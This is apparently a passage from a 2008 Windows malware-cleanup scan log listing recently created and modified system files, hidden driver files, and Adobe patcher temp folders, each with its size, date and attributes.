Process.exe -> %SystemRoot%\System32\Process.exe -> http://www.beyondlogic.org [Ver = 2, 0, 0, 0 | Size = 53248 bytes | Created Date = 8/22/2008 8:52:25 PM | Attr =    ]
SrchSTS.exe -> %SystemRoot%\System32\SrchSTS.exe -> S!Ri [Ver =  | Size = 288417 bytes | Created Date = 8/22/2008 8:52:25 PM | Attr =    ]
swreg.exe -> %SystemRoot%\System32\swreg.exe -> SteelWerX [Ver = 2.0.1.0 | Size = 135168 bytes | Created Date = 8/22/2008 8:52:25 PM | Attr =    ]
swsc.exe -> %SystemRoot%\System32\swsc.exe ->  [Ver =  | Size = 40960 bytes | Created Date = 8/22/2008 8:52:25 PM | Attr =    ]
swxcacls.exe -> %SystemRoot%\System32\swxcacls.exe -> SteelWerX [Ver = 1.0.1.1 | Size = 79360 bytes | Created Date = 8/22/2008 8:52:25 PM | Attr =    ]
tmp.reg -> %SystemRoot%\System32\tmp.reg ->  [Ver =  | Size = 4462 bytes | Created Date = 8/22/2008 8:52:37 PM | Attr =    ]
VACFix.exe -> %SystemRoot%\System32\VACFix.exe -> S!Ri.URZ [Ver =  | Size = 86528 bytes | Created Date = 8/22/2008 8:52:25 PM | Attr =    ]
VCCLSID.exe -> %SystemRoot%\System32\VCCLSID.exe -> S!Ri [Ver =  | Size = 289144 bytes | Created Date = 8/22/2008 8:52:25 PM | Attr =    ]
WS2Fix.exe -> %SystemRoot%\System32\WS2Fix.exe ->  [Ver =  | Size = 25600 bytes | Created Date = 8/22/2008 8:52:25 PM | Attr =    ]
SysRes.vbs -> %SystemRoot%\SysRes.vbs ->  [Ver =  | Size = 5830 bytes | Created Date = 8/18/2008 7:24:40 PM | Attr = RHS]

[Files/Folders - Modified Within 30 days]
Autorun.inf -> %SystemDrive%\Autorun.inf ->  [Ver =  | Size = 194 bytes | Modified Date = 8/24/2008 7:12:24 PM | Attr = RHS]
hiberfil.sys -> %SystemDrive%\hiberfil.sys ->  [Ver =  | Size = 1063714816 bytes | Modified Date = 8/24/2008 6:34:39 PM | Attr =  HS]
MDT -> %SystemDrive%\MDT ->  [Folder | Modified Date = 8/24/2008 6:35:00 PM | Attr =    ]
Program Files -> %ProgramFiles% ->  [Folder | Modified Date = 8/24/2008 7:08:38 PM | Attr =    ]
VETlog.dmp -> %SystemDrive%\VETlog.dmp ->  [Ver =  | Size = 53930 bytes | Modified Date = 8/18/2008 5:00:13 PM | Attr =    ]
WINDOWS -> %SystemRoot% ->  [Folder | Modified Date = 8/24/2008 6:34:53 PM | Attr =    ]
etc -> %SystemRoot%\System32\drivers\etc ->  [Folder | Modified Date = 8/20/2008 8:01:33 PM | Attr =    ]
hosts -> %SystemRoot%\System32\drivers\etc\hosts ->  [Ver =  | Size = 734 bytes | Modified Date = 8/22/2008 8:56:31 PM | Attr =    ]
404Fix.exe -> %SystemRoot%\System32\404Fix.exe -> S!Ri.URZ [Ver =  | Size = 82432 bytes | Modified Date = 8/18/2008 12:19:03 PM | Attr =    ]
AntiXPVSTFix.exe -> %SystemRoot%\System32\AntiXPVSTFix.exe -> S!Ri.URZ [Ver =  | Size = 87552 bytes | Modified Date = 8/21/2008 11:41:01 PM | Attr =    ]
CatRoot2 -> %SystemRoot%\System32\CatRoot2 ->  [Folder | Modified Date = 8/24/2008 6:35:17 PM | Attr =    ]
9 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> 
CONFIG.NT -> %SystemRoot%\System32\CONFIG.NT ->  [Ver =  | Size = 2626 bytes | Modified Date = 8/17/2008 4:38:59 PM | Attr =    ]
dllcache -> %SystemRoot%\System32\dllcache ->  [Folder | Modified Date = 8/20/2008 7:23:18 AM | Attr =    ]
drivers -> %SystemRoot%\System32\drivers ->  [Folder | Modified Date = 8/20/2008 8:41:13 PM | Attr =    ]
FC3D591647.sys -> %SystemRoot%\System32\FC3D591647.sys ->  [Ver =  | Size = 88 bytes | Modified Date = 8/21/2008 6:29:44 PM | Attr = RHS]
IEDFix.C.exe -> %SystemRoot%\System32\IEDFix.C.exe -> S!Ri.URZ [Ver =  | Size = 82432 bytes | Modified Date = 8/14/2008 9:52:23 PM | Attr =    ]
KGyGaAvL.sys -> %SystemRoot%\System32\KGyGaAvL.sys ->  [Ver =  | Size = 2828 bytes | Modified Date = 8/21/2008 6:29:44 PM | Attr =  HS]
LogFiles -> %SystemRoot%\System32\LogFiles ->  [Folder | Modified Date = 8/2/2008 9:17:16 PM | Attr =    ]
tmp.reg -> %SystemRoot%\System32\tmp.reg ->  [Ver =  | Size = 4462 bytes | Modified Date = 8/22/2008 8:56:35 PM | Attr =    ]
wpa.dbl -> %SystemRoot%\System32\wpa.dbl ->  [Ver =  | Size = 2206 bytes | Modified Date = 8/24/2008 6:35:24 PM | Attr =    ]
$hf_mig$ -> %SystemRoot%\$hf_mig$ ->  [Folder | Modified Date = 8/20/2008 7:23:07 AM | Attr =  H ]
1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> 
bootstat.dat -> %SystemRoot%\bootstat.dat ->  [Ver =  | Size = 2048 bytes | Modified Date = 8/24/2008 6:34:40 PM | Attr =   S]
CSC -> %SystemRoot%\CSC ->  [Folder | Modified Date = 8/24/2008 3:34:49 PM | Attr =  HS]
ie7updates -> %SystemRoot%\ie7updates ->  [Folder | Modified Date = 8/20/2008 7:21:05 AM | Attr =    ]
imsins.BAK -> %SystemRoot%\imsins.BAK ->  [Ver =  | Size = 1374 bytes | Modified Date = 8/20/2008 7:23:11 AM | Attr =    ]
inf -> %SystemRoot%\inf ->  [Folder | Modified Date = 8/20/2008 7:23:19 AM | Attr =  H ]
Prefetch -> %SystemRoot%\Prefetch ->  [Folder | Modified Date = 8/24/2008 7:13:15 PM | Attr =    ]
Registration -> %SystemRoot%\Registration ->  [Folder | Modified Date = 8/24/2008 6:35:11 PM | Attr =    ]
system32 -> %SystemRoot%\system32 ->  [Folder | Modified Date = 8/22/2008 8:56:35 PM | Attr =    ]
Tasks -> %SystemRoot%\Tasks ->  [Folder | Modified Date = 8/24/2008 6:37:46 PM | Attr =   S]
Temp -> %SystemRoot%\Temp ->  [Folder | Modified Date = 8/24/2008 7:13:31 PM | Attr =    ]
win.ini -> %SystemRoot%\win.ini ->  [Ver =  | Size = 759 bytes | Modified Date = 8/22/2008 3:11:19 PM | Attr =    ]
MP Scheduled Scan.job -> %SystemRoot%\tasks\MP Scheduled Scan.job ->  [Ver =  | Size = 330 bytes | Modified Date = 8/24/2008 6:37:46 PM | Attr =  H ]
SA.DAT -> %SystemRoot%\tasks\SA.DAT ->  [Ver =  | Size = 6 bytes | Modified Date = 8/24/2008 6:34:46 PM | Attr =  H ]
C:\Documents and Settings\All Users\Application Data\Microsoft\eHome\logs\ -> C:\Documents and Settings\All Users\Application Data\Microsoft\eHome\logs ->  [Folder | Modified Date = 8/24/2008 6:34:53 PM | Attr =    ]
eHomeLog-0.dat -> C:\Documents and Settings\All Users\Application Data\Microsoft\eHome\logs\eHomeLog-0.dat ->  [Ver =  | Size = 484 bytes | Modified Date = 6/24/2008 7:31:42 AM | Attr =  H ]
C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\ -> C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader ->  [Folder | Modified Date = 11/28/2006 1:15:00 PM | Attr =    ]
qmgr0.dat -> C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr0.dat ->  [Ver =  | Size = 5485 bytes | Modified Date = 8/24/2008 6:35:50 PM | Attr =    ]
qmgr1.dat -> C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Downloader\qmgr1.dat ->  [Ver =  | Size = 5485 bytes | Modified Date = 8/24/2008 6:35:50 PM | Attr =    ]
C:\Documents and Settings\All Users\Application Data\Microsoft\Office\Data\ -> C:\Documents and Settings\All Users\Application Data\Microsoft\Office\Data ->  [Folder | Modified Date = 3/16/2008 11:38:02 AM | Attr =    ]
data.dat -> C:\Documents and Settings\All Users\Application Data\Microsoft\Office\Data\data.dat ->  [Ver =  | Size = 1372 bytes | Modified Date = 12/4/2006 8:07:03 PM | Attr =    ]
opa11.dat -> C:\Documents and Settings\All Users\Application Data\Microsoft\Office\Data\opa11.dat ->  [Ver =  | Size = 8206 bytes | Modified Date = 3/16/2008 11:38:02 AM | Attr =    ]
C:\Documents and Settings\All Users\Application Data\Microsoft\Works\ -> C:\Documents and Settings\All Users\Application Data\Microsoft\Works ->  [Folder | Modified Date = 8/24/2008 8:17:36 AM | Attr =    ]
wkcalcat.dat -> C:\Documents and Settings\All Users\Application Data\Microsoft\Works\wkcalcat.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/23/2008 8:03:56 PM | Attr =    ]
wklntsk1.dat -> C:\Documents and Settings\All Users\Application Data\Microsoft\Works\wklntsk1.dat ->  [Ver =  | Size = 201374 bytes | Modified Date = 8/23/2008 9:21:37 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\RTPatch ->  [Folder | Modified Date = 5/18/2008 3:00:28 PM | Attr =    ]
patch.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\RTPatch\patch.exe ->  [Ver =  | Size = 34816 bytes | Modified Date = 5/18/2008 3:00:28 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\RTPatch ->  [Folder | Modified Date = 5/18/2008 2:56:09 PM | Attr =    ]
patch.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\RTPatch\patch.exe ->  [Ver =  | Size = 34816 bytes | Modified Date = 5/18/2008 2:56:09 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea ->  [Folder | Modified Date = 5/18/2008 2:59:57 PM | Attr =    ]
4185.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4185.exe -> Adobe Systems [Ver = 1.1.0 | Size = 6264768 bytes | Modified Date = 9/19/2007 7:11:42 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\RTPatch ->  [Folder | Modified Date = 5/18/2008 3:00:06 PM | Attr =    ]
patch.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\RTPatch\patch.exe ->  [Ver =  | Size = 34816 bytes | Modified Date = 5/18/2008 3:00:06 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\RTPatch ->  [Folder | Modified Date = 5/18/2008 2:53:56 PM | Attr =    ]
patch.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\RTPatch\patch.exe ->  [Ver =  | Size = 34816 bytes | Modified Date = 5/18/2008 2:53:56 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea ->  [Folder | Modified Date = 5/18/2008 2:55:07 PM | Attr =    ]
1393.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1393.exe -> Adobe Systems, Inc. [Ver = 2.1.1 | Size = 11777960 bytes | Modified Date = 11/6/2007 11:36:12 AM | Attr =    ]
1423.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1423.exe -> Adobe Systems, Inc. [Ver = 2.0 | Size = 124840 bytes | Modified Date = 11/6/2007 11:36:14 AM | Attr =    ]
1732.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1732.exe -> Adobe Systems Incorporated [Ver = 4.0.0.76626 | Size = 4937640 bytes | Modified Date = 11/6/2007 11:36:18 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\RTPatch ->  [Folder | Modified Date = 5/18/2008 3:02:10 PM | Attr =    ]
patch.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\RTPatch\patch.exe ->  [Ver =  | Size = 34816 bytes | Modified Date = 5/18/2008 3:02:10 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\StagingArea\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\StagingArea ->  [Folder | Modified Date = 5/18/2008 3:02:27 PM | Attr =    ]
1111.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5048\StagingArea\1111.exe -> Adobe Systems, Incorporated [Ver = 10.0.1 (10.0.1x20071012 [20071012.r.1644 09:30:00 cutoff; r branch]) | Size = 44814336 bytes | Modified Date = 10/20/2007 9:11:42 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\RTPatch ->  [Folder | Modified Date = 5/18/2008 3:02:36 PM | Attr =    ]
patch.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5456\RTPatch\patch.exe ->  [Ver =  | Size = 34816 bytes | Modified Date = 5/18/2008 3:02:36 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\RTPatch ->  [Folder | Modified Date = 5/18/2008 2:55:11 PM | Attr =    ]
patch.exe -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher5796\RTPatch\patch.exe ->  [Ver =  | Size = 34816 bytes | Modified Date = 5/18/2008 2:55:11 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\_PASFX795\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\_PASFX795 ->  [Folder | Modified Date = 3/20/2008 12:41:30 AM | Attr =    ]
7Z.DLL -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\_PASFX795\7Z.DLL ->  [Ver =  | Size = 76288 bytes | Modified Date = 3/20/2008 12:37:58 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\{0EE6E933-C5E5-49D0-9E29-278FD31730B3}\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\{0EE6E933-C5E5-49D0-9E29-278FD31730B3} ->  [Folder | Modified Date = 2/17/2008 8:35:03 AM | Attr =    ]
ISSetup.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\{0EE6E933-C5E5-49D0-9E29-278FD31730B3}\ISSetup.dll -> Macrovision Corporation [Ver = 12.0.49974 | Size = 552214 bytes | Modified Date = 10/30/2006 8:10:00 AM | Attr = R  ]
_Setup.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\{0EE6E933-C5E5-49D0-9E29-278FD31730B3}\_Setup.dll -> Macrovision Corporation [Ver = 12.0.49974 | Size = 385968 bytes | Modified Date = 10/30/2006 8:10:00 AM | Attr = R  ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\{D7BF6560-C709-4A54-9FC7-1BEA08687CA2}\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\{D7BF6560-C709-4A54-9FC7-1BEA08687CA2} ->  [Folder | Modified Date = 2/17/2008 8:32:07 AM | Attr =    ]
ISSetup.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\{D7BF6560-C709-4A54-9FC7-1BEA08687CA2}\ISSetup.dll -> Macrovision Corporation [Ver = 12.0.49974 | Size = 552214 bytes | Modified Date = 11/14/2006 2:08:52 AM | Attr = R  ]
_Setup.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\{D7BF6560-C709-4A54-9FC7-1BEA08687CA2}\_Setup.dll -> Macrovision Corporation [Ver = 12.0.49974 | Size = 385968 bytes | Modified Date = 5/17/2006 11:21:04 AM | Attr = R  ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592 ->  [Folder | Modified Date = 5/18/2008 3:00:31 PM | Attr =    ]
InstallerResults.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\InstallerResults.dll ->  [Ver =  | Size = 153280 bytes | Modified Date = 5/18/2008 3:00:17 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\CAPS\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\CAPS ->  [Folder | Modified Date = 5/18/2008 3:00:17 PM | Attr =    ]
adobe_caps.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\CAPS\adobe_caps.dll -> Adobe Systems Incorporated [Ver = 1,0,135,0 | Size = 215040 bytes | Modified Date = 5/18/2008 3:00:17 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\RTPatch ->  [Folder | Modified Date = 5/18/2008 3:00:28 PM | Attr =    ]
patchw32.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher2592\RTPatch\patchw32.dll ->  [Ver =  | Size = 182272 bytes | Modified Date = 5/18/2008 3:00:28 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher3684\CAPS\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher3684\CAPS ->  [Folder | Modified Date = 5/18/2008 2:51:37 PM | Attr =    ]
adobe_caps.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher3684\CAPS\adobe_caps.dll -> Adobe Systems Incorporated [Ver = 1,0,135,0 | Size = 215040 bytes | Modified Date = 5/18/2008 2:51:38 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424 ->  [Folder | Modified Date = 5/18/2008 2:59:58 PM | Attr =    ]
InstallerResults.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\InstallerResults.dll ->  [Ver =  | Size = 153016 bytes | Modified Date = 5/18/2008 2:55:22 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\CAPS\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\CAPS ->  [Folder | Modified Date = 5/18/2008 2:55:22 PM | Attr =    ]
adobe_caps.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\CAPS\adobe_caps.dll -> Adobe Systems Incorporated [Ver = 1,0,135,0 | Size = 215040 bytes | Modified Date = 5/18/2008 2:55:22 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\RTPatch ->  [Folder | Modified Date = 5/18/2008 2:56:09 PM | Attr =    ]
patchw32.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\RTPatch\patchw32.dll ->  [Ver =  | Size = 182272 bytes | Modified Date = 5/18/2008 2:56:09 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea ->  [Folder | Modified Date = 5/18/2008 2:59:57 PM | Attr =    ]
4186.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4186.dll -> Adobe Systems, Inc. [Ver = 2.1.2.1069 (BuildVersion: 46.276280; BuildDate: Thu Feb 15 2007 22:34:47) | Size = 2662400 bytes | Modified Date = 9/19/2007 7:11:38 AM | Attr =    ]
4187.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4187.dll -> Macrovision Europe Ltd. [Ver = 11.03.005 | Size = 2531328 bytes | Modified Date = 9/19/2007 7:11:38 AM | Attr =    ]
4204.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4204.dll -> Adobe Systems Incorporated [Ver = 6.0.4 | Size = 1410048 bytes | Modified Date = 9/19/2007 7:11:42 AM | Attr =    ]
4577.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4577.dll ->  [Ver =  | Size = 135168 bytes | Modified Date = 9/19/2007 7:11:44 AM | Attr =    ]
4589.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4589.dll -> Opera Software [Ver = 8773 | Size = 3272704 bytes | Modified Date = 9/19/2007 7:11:36 AM | Attr =    ]
4590.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4590.dll ->  [Ver =  | Size = 25600 bytes | Modified Date = 9/19/2007 7:11:36 AM | Attr =    ]
4591.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\4591.dll ->  [Ver =  | Size = 34816 bytes | Modified Date = 9/19/2007 7:11:40 AM | Attr =    ]
5302.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\5302.dll ->  [Ver =  | Size = 81920 bytes | Modified Date = 9/19/2007 7:11:38 AM | Attr =    ]
5303.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\5303.dll ->  [Ver =  | Size = 46592 bytes | Modified Date = 9/19/2007 7:11:38 AM | Attr =    ]
5304.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\5304.dll ->  [Ver =  | Size = 724992 bytes | Modified Date = 9/19/2007 7:11:40 AM | Attr =    ]
5305.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4424\StagingArea\5305.dll ->  [Ver =  | Size = 716800 bytes | Modified Date = 9/19/2007 7:11:42 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4440\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4440 ->  [Folder | Modified Date = 8/17/2008 7:55:46 AM | Attr =    ]
InstallerResults.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4440\InstallerResults.dll ->  [Ver =  | Size = 153280 bytes | Modified Date = 8/17/2008 7:55:38 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4440\CAPS\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4440\CAPS ->  [Folder | Modified Date = 8/17/2008 7:55:38 AM | Attr =    ]
adobe_caps.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4440\CAPS\adobe_caps.dll -> Adobe Systems Incorporated [Ver = 1,0,135,0 | Size = 215040 bytes | Modified Date = 8/17/2008 7:55:38 AM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528 ->  [Folder | Modified Date = 5/18/2008 3:00:14 PM | Attr =    ]
InstallerResults.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\InstallerResults.dll ->  [Ver =  | Size = 153280 bytes | Modified Date = 5/18/2008 3:00:02 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\CAPS\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\CAPS ->  [Folder | Modified Date = 5/18/2008 3:00:02 PM | Attr =    ]
adobe_caps.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\CAPS\adobe_caps.dll -> Adobe Systems Incorporated [Ver = 1,0,135,0 | Size = 215040 bytes | Modified Date = 5/18/2008 3:00:02 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\RTPatch ->  [Folder | Modified Date = 5/18/2008 3:00:06 PM | Attr =    ]
patchw32.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4528\RTPatch\patchw32.dll ->  [Ver =  | Size = 182272 bytes | Modified Date = 5/18/2008 3:00:06 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596 ->  [Folder | Modified Date = 5/18/2008 2:55:07 PM | Attr =    ]
InstallerResults.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\InstallerResults.dll ->  [Ver =  | Size = 153016 bytes | Modified Date = 5/18/2008 2:53:39 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\CAPS\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\CAPS ->  [Folder | Modified Date = 5/18/2008 2:53:39 PM | Attr =    ]
adobe_caps.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\CAPS\adobe_caps.dll -> Adobe Systems Incorporated [Ver = 1,0,135,0 | Size = 215040 bytes | Modified Date = 5/18/2008 2:53:39 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\RTPatch\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\RTPatch ->  [Folder | Modified Date = 5/18/2008 2:53:56 PM | Attr =    ]
patchw32.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\RTPatch\patchw32.dll ->  [Ver =  | Size = 182272 bytes | Modified Date = 5/18/2008 2:53:56 PM | Attr =    ]
C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\ -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea ->  [Folder | Modified Date = 5/18/2008 2:55:07 PM | Attr =    ]
1313.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1313.dll -> Opera Software [Ver = 8773 | Size = 3272704 bytes | Modified Date = 11/6/2007 11:36:30 AM | Attr =    ]
1315.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1315.dll ->  [Ver =  | Size = 25600 bytes | Modified Date = 11/6/2007 11:36:32 AM | Attr =    ]
1339.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1339.dll -> Adobe Systems Incorporated [Ver = 4.0.0.76626 | Size = 57344 bytes | Modified Date = 11/6/2007 11:36:24 AM | Attr =    ]
1374.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1374.dll -> Adobe Systems, Incorporated [Ver = 3.0.0.63netio24 | Size = 147456 bytes | Modified Date = 11/6/2007 11:36:32 AM | Attr =    ]
1451.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1451.dll -> Adobe Systems Incorporated [Ver = 2.0d12 | Size = 73728 bytes | Modified Date = 11/6/2007 11:36:14 AM | Attr =    ]
1557.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1557.dll -> Adobe Systems Incorporated [Ver = 2.0.1.1504 | Size = 372736 bytes | Modified Date = 11/6/2007 11:36:38 AM | Attr =    ]
1661.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1661.dll -> Adobe Systems Incorporated [Ver = 2.0.1.1504 | Size = 340992 bytes | Modified Date = 11/6/2007 11:36:14 AM | Attr =    ]
1733.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1733.dll -> Macrovision Europe Ltd. [Ver = 11.03.005 | Size = 2531328 bytes | Modified Date = 11/6/2007 11:36:26 AM | Attr =    ]
1783.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1783.dll -> Adobe Systems, Incorporated [Ver = 3.7.72 | Size = 540672 bytes | Modified Date = 11/6/2007 11:36:22 AM | Attr =    ]
1903.dll -> C:\Documents and Settings\Tom Jr\Local Settings\Temp\Patcher\Patcher4596\StagingArea\1903.dll ->  [Ver = 4.1-c037, 46.282696, Mon Apr 02 2007 18:36:42 | Size = 393216 bytes | Modified Date = 11/6/2007 11:36:20 AM | Attr =    ]
